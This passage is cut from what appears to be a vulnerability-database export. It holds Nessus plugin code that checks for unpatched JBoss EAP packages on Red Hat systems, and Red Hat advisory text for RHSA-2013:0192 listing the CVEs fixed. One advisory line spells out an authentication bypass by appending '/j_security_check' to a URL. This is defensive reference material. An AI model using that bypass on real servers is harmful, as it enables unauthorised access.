reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-vfs2-2.2.1-2.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-5.2.0-14.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-client-5.2.0-14.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-hornetq-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-messaging-5.2.0-14.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-tp-licenses-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-ws-cxf-5.2.0-8.ep5.el4\")) flag++;\n if 
(rpm_check(release:\"RHEL4\", reference:\"jbossas-ws-native-5.2.0-14.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbosssx2-2.0.5-8.3.SP3_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossts-4.6.1-12.CP13.8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jgroups-2.6.22-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-jboss-as-5-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if 
(rpm_check(release:\"RHEL4\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"netty-3.2.5-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-federation-2.1.5-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rh-eap-docs-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rh-eap-docs-examples-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-common-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-client-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"rhq-core-comm-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-domain-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-gui-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-native-system-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-plugin-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-plugin-container-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-util-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-jboss-as-common-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-modules-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-platform-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-plugins-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if 
(rpm_check(release:\"RHEL4\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"wss4j-1.5.12-4.2_patch_02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-security-1.5.1-2.ep5.el4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:03", "description": "Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now 
available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. 
(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. 
If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": null, "vector": null}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 5 : JBoss EAP (RHSA-2013:0192)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", 
"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:hornetq-native", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", 
"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas", "p-cpe:/a:redhat:enterprise_linux:jbossas-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq", "p-cpe:/a:redhat:enterprise_linux:jbossas-messaging", "p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", 
"p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:netty", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common", 
"p-cpe:/a:redhat:enterprise_linux:rhq-helpers", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2013-0192.NASL", "href": "https://www.tenable.com/plugins/nessus/64079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0192. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64079);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_bugtraq_id(51392, 53877, 54183, 54631, 54915, 55770, 56812);\n script_xref(name:\"RHSA\", value:\"2013:0192\");\n\n script_name(english:\"RHEL 5 : JBoss EAP (RHSA-2013:0192)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Application Platform 5.2.0 packages that fix\nmultiple security issues, various bugs, and add several enhancements\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Application Platform 5.1.2, and\nincludes bug fixes and enhancements. Refer to the JBoss Enterprise\nApplication Platform 5.2.0 Release Notes for information on the most\nsignificant of these changes. 
The Release Notes will be available\nshortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. 
(CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. 
